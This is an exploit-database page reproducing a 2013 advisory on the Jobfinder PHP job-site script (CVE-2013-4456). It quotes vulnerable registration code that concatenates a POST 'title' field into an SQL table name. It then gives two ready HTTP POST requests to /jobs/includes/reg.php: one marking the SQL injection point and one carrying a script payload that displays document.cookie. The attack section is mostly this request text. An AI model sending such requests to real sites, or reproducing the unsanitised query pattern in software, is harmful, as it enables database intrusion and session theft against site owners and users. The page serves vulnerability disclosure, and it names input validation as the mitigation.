header-logo
Suggest Exploit
vendor:
Jobfinder
by:
AtT4CKxT3rR0r1ST
8,8
CVSS
HIGH
Post Sql Injection
89
CWE
Product Name: Jobfinder
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2013-4456
CPE: a:jobfinder:jobfinder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2013

Jobsite logo – Multiple Vulnerabilties

Note: enter the registration page[register.php] and register there, then take the post code. POST /jobs/includes/reg.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/jobs/register.php Cookie: Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 122 title=[SQL INJECTION]&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=

Mitigation:

Input validation and sanitization
Source

Exploit-DB raw data:

Jobsite logo  - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://sourceforge.net/projects/jobfinder/
####################################################################
VULNERABILITY
##############
/includes/reg.php (line 4-28)

$user=addslashes($_POST['user']);
    $pass=addslashes($_POST['user_password']);
    $email=$_POST['email'];
    $pass2=addslashes($_POST['user_password2']);
    $firstname=addslashes($_POST['firstname']);
    $lastname=addslashes($_POST['lastname']);
    $middlename=addslashes($_POST['middlename']);
    $title=addslashes($_POST['title']);
    $address=addslashes($_POST['address']);
    $city=addslashes($_POST['city']);

    if(isset($user) && isset($pass))
    {


    $email=addslashes($email);
    if($pass2!=$pass)
    {
        echo "<script type='text/javascript'>javascript:alert('Passwords
doesnt match.');</script>";
        exit;
    }
    $connection = new db();
    $connection->connect();

       $result = mysql_query("SELECT username FROM mobagi_".$title." WHERE
username='".$user."' ")or die (mysql_error());


#########
EXPLOIT
#########

[1] Post Sql Injection
======================

Note: enter the registration page[register.php] and register there , then
take the post code


POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

title=[SQL
INJECTION]&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register



[2] Post Cross Site Scripting
===============================

POST /jobs/includes/reg.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/jobs/register.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

title=<script>alert(document.cookie);</script>&firstname=&middlename=&lastname=&address=&city=&user=&user_password=&user_password2=&email=&Submit=Register


####################################################################

Navigation

Suggest Exploit

Services By CQR